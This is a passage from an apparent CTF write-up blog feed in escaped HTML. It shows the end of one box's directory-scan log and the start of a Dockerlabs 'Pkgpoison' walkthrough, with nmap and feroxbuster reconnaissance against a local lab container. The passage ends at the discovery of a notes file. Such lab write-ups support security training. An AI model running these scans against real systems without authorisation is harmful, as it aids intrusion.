&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/mail.log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/proxy_error_log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/proxy_access_ssl_log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/wsadmin.traceout
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/errors.log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:18&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /logs/www-error.log
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:21&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /server-status/                                   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;10:03:21&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   275B - /server-status                                    
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Task Completed                           
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;发现存在一个&lt;code&gt;/logs&lt;/code&gt;目录，但是无法直接查看，还是来到登陆页面查看&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Pkgpoison</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-pkgpoison/</link>
      <pubDate>Sat, 31 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-pkgpoison/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/pkgpoison  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 172.17.0.2 -sV -A -p-                                                        
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Starting Nmap 7.95 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; at 2025-05-31 03:57 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Nmap scan report &lt;span class=&#34;k&#34;&gt;for&lt;/span&gt; 172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Host is up &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;0.000057s latency&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Not shown: &lt;span class=&#34;m&#34;&gt;65533&lt;/span&gt; closed tcp ports &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;reset&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;3072&lt;/span&gt; 2f:87:50:66:15:23:d6:c3:90:3f:ea:8c:a4:4b:b3:ff &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;RSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; d1:35:c1:82:09:e8:c2:c7:cd:98:89:61:c2:6b:14:64 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; dd:01:45:ce:bd:a3:05:21:5b:31:4c:2f:df:38:c4:f6 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp open  http    Apache httpd 2.4.41 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: &lt;span class=&#34;m&#34;&gt;404&lt;/span&gt; Not Found
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.41 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-c&#34; data-lang=&#34;c&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;root&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;@&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;kali&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;home&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;kali&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;pkgpoison&lt;/span&gt;  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;err&#34;&gt;❯&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;feroxbuster&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;u&lt;/span&gt; &lt;span class=&#34;err&#34;&gt;&amp;#39;&lt;/span&gt;&lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/&amp;#39; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt   
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;n&#34;&gt;___&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;___&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;   &lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;     &lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;         &lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;   &lt;span class=&#34;n&#34;&gt;___&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;  &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;  &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;  &lt;span class=&#34;err&#34;&gt;`&lt;/span&gt;    &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;  &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt; &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;_&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;  &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;    &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;___&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;  &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;  &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;,&lt;/span&gt;    &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt; &lt;span class=&#34;err&#34;&gt;\&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;__&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;|&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;___&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;by&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Ben&lt;/span&gt; &lt;span class=&#34;s&#34;&gt;&amp;#34;epi&amp;#34;&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Risher&lt;/span&gt; &lt;span class=&#34;err&#34;&gt;🤓&lt;/span&gt;                 &lt;span class=&#34;nl&#34;&gt;ver&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt; &lt;span class=&#34;mf&#34;&gt;2.11.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;err&#34;&gt;───────────────────────────┬──────────────────────&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🎯&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Target&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Url&lt;/span&gt;            &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🚀&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Threads&lt;/span&gt;               &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;50&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;📖&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Wordlist&lt;/span&gt;              &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;usr&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;share&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;wordlists&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;dirbuster&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;directory&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;list&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;mf&#34;&gt;2.3&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;medium&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;👌&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Status&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Codes&lt;/span&gt;          &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;All&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Status&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Codes&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;💥&lt;/span&gt;  &lt;span class=&#34;nf&#34;&gt;Timeout&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;secs&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;)&lt;/span&gt;        &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🦡&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;User&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Agent&lt;/span&gt;            &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;feroxbuster&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;mf&#34;&gt;2.11.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;💉&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Config&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;File&lt;/span&gt;           &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;etc&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;feroxbuster&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;ferox&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;config&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;toml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🔎&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Extract&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Links&lt;/span&gt;         &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;nb&#34;&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;💲&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Extensions&lt;/span&gt;            &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;php&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;,&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;txt&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🏁&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;HTTP&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;methods&lt;/span&gt;          &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🔃&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Recursion&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Depth&lt;/span&gt;       &lt;span class=&#34;err&#34;&gt;│&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;err&#34;&gt;───────────────────────────┴──────────────────────&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;err&#34;&gt;🏁&lt;/span&gt;  &lt;span class=&#34;n&#34;&gt;Press&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;ENTER&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;to&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;use&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;the&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Scan&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Management&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Menu&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;™&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;err&#34;&gt;──────────────────────────────────────────────────&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;404&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;        &lt;span class=&#34;mi&#34;&gt;9l&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;31&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;      &lt;span class=&#34;mi&#34;&gt;272&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Auto&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;filtering&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;found&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;404&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;like&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;response&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;and&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;created&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;new&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;filter&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;toggle&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;off&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;with&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;--&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;dont&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;filter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;403&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;        &lt;span class=&#34;mi&#34;&gt;9l&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;28&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;      &lt;span class=&#34;mi&#34;&gt;275&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Auto&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;filtering&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;found&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;404&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;like&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;response&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;and&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;created&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;new&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;filter&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;toggle&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;off&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;with&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;--&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;dont&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;-&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;filter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;301&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;        &lt;span class=&#34;mi&#34;&gt;9l&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;28&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;      &lt;span class=&#34;mi&#34;&gt;308&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/notes =&amp;gt; http://172.17.0.2/notes/
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;200&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;        &lt;span class=&#34;mi&#34;&gt;5l&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;24&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;      &lt;span class=&#34;mi&#34;&gt;177&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/notes/note.txt
